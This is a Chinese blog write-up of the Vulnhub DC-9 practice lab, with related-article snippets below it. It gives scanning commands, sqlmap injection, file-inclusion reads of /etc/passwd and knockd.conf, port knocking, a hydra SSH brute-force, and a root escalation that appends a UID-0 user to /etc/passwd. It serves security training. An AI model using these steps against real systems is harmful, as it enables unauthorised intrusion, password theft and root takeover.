【DC9靶场通关详细记录】

最新推荐文章于 2024-03-29 17:12:37 发布
最新推荐文章于 2024-03-29 17:12:37 发布
阅读量1.2k 收藏 29
点赞数 27
分类专栏: DC靶场通关记录系列 文章标签: 网络 网络安全 web安全 笔记 经验分享 安全 系统安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46678448/article/details/135151723
版权

DC9靶场通关记录

环境搭建

  1. DC8主机靶场,点击下载
  2. 导入下载文件,如果报错点击重试
  3. 更改kali和DC8靶场的网络配置为统一的连接模式

信息收集

扫描确定IP

使用arp-scan扫描网络,确定靶机IP,使用以下命令

arp-scan -l

image.png

扫描端口以及服务

使用nmap对靶机进行扫描,确定开启的端口,以及端口对应的服务,使用以下命令

nmap -sV -p- -A 192.168.223.130

image.png

指纹识别

尝试访问靶机开放的端口80,是一个网站,可以尝试对靶机进行指纹识别,使用以下命令

whatweb -v 192.168.223.130

image.png

目录爆破

靶机上搭建了一个网站,尝试进行目录爆破,使用一下命令

dirsearch -u 192.168.223.130

image.png

查找漏洞

尝试搜索框是否注入

  1. 通过burp抓包发现此处有sql注入点

image.png

  1. 将search的数据设置为1,并保存数据包使用sqlmap

sqlmap -r sql2.txt

在sqlmap进行注入的时候会弹出三个选项,进行以下选择
image.png

  1. sqlmap注入成功,提示是联合注入和时间盲注

image.png

当前数据库爆破

  1. 查看当前数据库

image.png

  1. 查看所有数据库

image.png

  1. 查看当前数据库所有表

image.png

  1. 查看当前数据库的user表的列

image.png

  1. 查看表内容,获取当账号和加密的密码

image.png

破解加密密码登录,利用文件包含漏洞

  1. 破解密码

image.png

  1. 登录网站,多了一个增加的功能,网站下面提示了file does not exist(文件不存在),可能存在文件包含漏洞

image.png

  1. 尝试使用file参数,读取文件/etc/passwd,显示文件有许多用户

image.png

对另一数据库爆破

  1. 查看看到一组用户名和密码

image.png

  1. 对比passwd文件发现用户名是一样的

image.png

  1. 将用户名和密码dump出来,分别单独保存到单个文件中

image.png

端口敲门knockd

  1. 信息收集的端口扫描到ssh的22端口的状态是filtered,可以端口敲门打开端口
  2. 尝试文件包含漏洞,查看是否有knockd的配置文件

knockd的配置文件路径
/etc/knockd.conf

image.png

  1. 按照配置文件的端口进行敲门,打开靶机的ssh端口
  1. 使用nc、nmap、knockd都可以敲门成功
nc  192.168.223.130  7469
nc  192.168.223.130  8475
nc  192.168.223.130  9842apt-get install  knockd
knock -v 192.168.223.130  7469 8475 9842

image.png

通过ssh进行提权

hydra破解ssh的账号密码

  1. 通过数据库的账号密码破解ssh的账号密码
hydra -L user.txt -P pass.txt  ssh://192.168.223.130

image.png

  1. 尝试登陆,在使用最后一个用户登录时存在一个存放密码的隐藏文件

image.png

  1. 将该组密码加入密码字典重新破解,出现新的一个账户密码

image.png

使用新的账号尝试进行提权

  1. 切换到新用户中fredf

image.png

  1. 尝试提权

sudo -l //出现以root权限执行的文件

image.png

  1. 访问该文件,查看该文件的用法

image.png

  1. 查找文件用法提示的脚本,脚本的功能:将参数为1的内容写到参数2中

./test.py 1文件 2文件
将1文件的内容写入2文件

image.png

创造条件使用该脚本

  1. 生成md5密码创建类似passwd的文件写入创建的用户
  • openssl passwd -1 -salt admin 123456
    • -1 :表示采用的是MD5加密算法
    • -salt:指定salt值,不使用随机产生的salt。在使用加密算法进行加密时,即使密码一样,salt不一样,所计算出来的hash值也不一样,除非密码一样,salt值也一样,计算出来的hash值才一样。salt为8字节的字符串。
1. openssl passwd -1 -salt admin  123456
2. echo 'admin:加密后的密码:0:0:admin:/root:/bin/bash'  >> /tmp/passwd
3. echo "admin:$(openssl passwd 12345):0:0:admin:/root:/bin/bash"  >> /tmp/passwd

image.png

  1. 使用该脚本
./test /tmp/passwd  /etc/passwd //不成功
sudo ./test  /tmp/passwd  /etc/passwd

image.png

  1. 查看passwd文件,查看创建的用户是否追加进去

image.png

提权成功获得flag

su admin

image.png

总结

  1. 文件包含漏洞,读取配置文件
  2. knockd端口敲门

配置文件路径/etc/knockd.conf

nc  192.168.223.130  7469
nc  192.168.223.130  8475
nc  192.168.223.130  9842apt-get install  knockd
knock -v 192.168.223.130  7469 8475 9842
  1. hydra破解ssh登录密码
hydra -L 用户名字典 -P 密码字典  ssh://ip
  1. 利用脚本提权,根据脚本的使用方法构造相关环境进行利用,获取权限

主机渗透DC1-9靶场已经完成 😃

榕小树
关注
  • 27
    点赞
  • 29
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Vulnhub DC-9靶场
weixin_47019868的博客
11-25 146
Vulnhub DC-9靶场
DC-9 靶场
wcl20010的博客
05-02 811
靶机地址:链接:https://pan.baidu.com/s/1kMLviFtz2JosS422-L1Tgw 提取码:c5ur 1.主机发现 nmap -sP 192.168.128.1/24 arp-scan -l #得到IP 192.168.128.131 2.端口扫描 nmap -p 1-65535 -A 192.168.128.131 # 22 80端口 3.目录扫描 dirb http://192.168.128.131...
DC-9靶场
mlws1900的博客
03-29 921
发现靶机的ip地址为192.168.111.137,攻击机(kali)的ip地址为192.168.111.128。,而且需要按照顺序‘敲’端口。登录成功,下面显示file does not exist ,怀疑包含了某文件,所以尝试文件包含。将这一串密码加入刚刚的爆破密码中,重新进行爆破,生成newpass.txt。openssl生成密码,前一个mlws为账号,后一个1900为要加密的密码。发现代码作用需要两个文件,把第一文件追加到第二个文件后。使用test文件,将该文件的内容写入到passwd中。
vulnhub靶场DC-9
kukudeshuo的博客
07-17 886
vulnhub靶场DC-9 环境准备 攻击机:kali(192.168.58.130) 靶机:DC-9(192.168.58.155) 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 信息收集 使用arp-scan确定目标靶机 确定目标靶机IP为192.168.58.155 使用nmap扫描查看目标靶机端口开放情况 可以看到扫描结果是开放了22、80端口,但是22端口被过滤了 浏览器访问目标靶机80端口 使用浏览器插件wappal
vulnhub DC9 靶场练习
鸥鹭忘机
09-05 1829
前言 这次练习的靶机是vulnhub平台下的DC系列靶机第9台,也是最后一台。下载地址为https://www.vulnhub.com/entry/dc-9,412/。挑战该靶机的最终目的是获取root权限,然后读取唯一的flag。这台靶机的难度为中等,其关键点是需要知道knockd服务。建议在挑战该靶机之前了解一下knockd服务。 虚拟机配置 这次采用的网络连接模式依然是NAT模式,为了避免扫描到其他物理主机。在导入虚拟机后,右击DC-9靶机,然后选中配置。依次点击网络配置->NAT模式->
vuInhub靶场实战系列-DC-9实战
最新发布
06-02
vuInhub靶场实战系列-DC-9实战
靶机-DC1通关详细过程
06-27
靶机-DC1通关详细过程
vuInhub靶场实战系列-DC-6实战
05-29
vuInhub靶场实战系列-DC-6实战
VulnHub 渗透测试靶场 -DC-9
11-21
DC-9 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这一挑战的最终目标是扎根并读取唯一的标志。 Linux 技能和熟悉 Linux 命令行是必须的,还有一些基本渗透测试工具的经验。 对于初学者来...
vulnhub靶场库中 DC:1
07-06
1. **Vulnhub靶场库与DC:1介绍** Vulnhub是一个在线资源库,提供了一系列虚拟机镜像,这些镜像设计为安全学习和实践平台,尤其是对于网络安全初学者。DC:1是Vulnhub靶场库中的一个特定靶机,它旨在帮助用户学习和...
Vulnhub靶场实战---DC-9
一期一会的博客
12-23 2301
​ 0x00 环境准备 1.官网下载地址: https://www.vulnhub.com/entry/dc-9,412/ 2.下载完成之后直接导入vm,使用NAT模式连接,保持在同一网段 攻击机:kali (192.168.88.130) 靶机:DC-8 (192.168.88.132) 0x01 信息收集 老办法,使用arp-scan -l 找到目标主机,目标主机ip为192.168.88.132 查看开放端口,22端口被过滤,登录80端口查看 nmap -sV -p- -A 192.168.88.
靶场练习第十七天~vulnhub靶场dc-9
qq_57976347的博客
02-16 825
一、准备工作 kali和靶机都选择NAT模式(kali与靶机同网段) 1.靶场环境 下载链接:https://download.vulnhub.com/dc/DC-9.zip 2.kali的ip 命令:ifconfig 3.靶机的ip 扫描靶机ip sudo arp-scan -l 二、信息收集 1.nmap的信息收集 (1)扫描靶机开放的端口及其服务 nmap -A -p- 192.168.101.122 2.网站的信息收集 (1)靶机开放了80端口,先访问
Vulnhub靶机DC系列-DC-9
m0_54525483的博客
01-13 2682
Vulnhub靶机DC系列-DC-9 靶场环境 靶场名称:DC-9 靶场地址:https://www.vulnhub.com/entry/dc-9,412/ 下载地址: DC-9.zip (Size: 700 MB) Download: http://www.five86.com/downloads/DC-9.zip Download (Mirror): https://download.vulnhub.com/dc/DC-9.zip Download (Torrent): https://download
DC9靶场渗透
qq_20032803的博客
02-03 605
1.发现主机/扫描 root@kali:~# ifconfig eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500 inet 192.168.100.128 netmask 255.255.255.0 broadcast 192.168.100.255 inet6 fe80::20c:29ff:fe72:6e3e prefixlen 64 scopeid 0x20<link>
Vulhub 靶场训练 DC-9解析
黑战士的博客
02-26 431
3.按照/etc/passwd的格式写一个文件,通过test脚本追加到/etc/passwd中即可提权,运行脚本的时候最好切换到test目录下,test.py的路径为绝对路径。切换到test目录看下,找下这个test.py,在/opt/devstuff目录下,脚本的作用就是将第一个文件的内容附加到另一个文件里面去。/etc/knockd.conf文件,结合搜索到的相关知识,知道用nc分别去尝试这三个端口可以打开SSH端口。运行脚本的时候最好切换到test目录下,test.py的路径为绝对路径。
vulnhub-dc9靶场渗透
大熊
06-16 183
通过这次打靶场学习和巩固到的知识:1. 在nmap信息收集扫描端口时,需要注意端口的开放状态。2. sql注入漏洞的发现和利用。3. 通过参数Fuzz隐藏的参数到发现文件包含漏洞并进行利用。4. knock:端口敲门服务的利用,通过依次访问目标端口,触发knock服务的规则,开启相应的端口,从而进一步的利用。5. 通过Sudo -l查看是否有高权限可执行文件,并分析进一步利用进行提权等。
vulhub靶场学习日记DC9
m0_55763479的博客
09-07 1140
vulhub靶场学习日记DC9
靶机实操:vulnhub-DC9
不想当脚本小子的脚本小子
01-07 316
先:IP为192.168.40.132,开放了22和80端口,服务器为apache2.4.38(到时候搜一下有没有漏洞),robots.txt里啥都没有,浏览了一下网页,几个界面都是php,有一个登录界面。dirbuster扫一下看什么结果: ...
Vulnhub靶机渗透学习——DC-9
qq_45612828的博客
07-02 2985
Vulnhub靶机渗透学习——DC-9
ssti-lab靶场通关
09-02
为了通关ssti-lab靶场,你可以按照以下步骤进行操作: 1. 首先,从上一个数据库中找到的password字典中获取到mssql的账户密码。 2. 使用这个账户密码进行mssql的暴力破解,以获得访问权限。 3. 一旦你获得了访问权限...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

榕小树

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值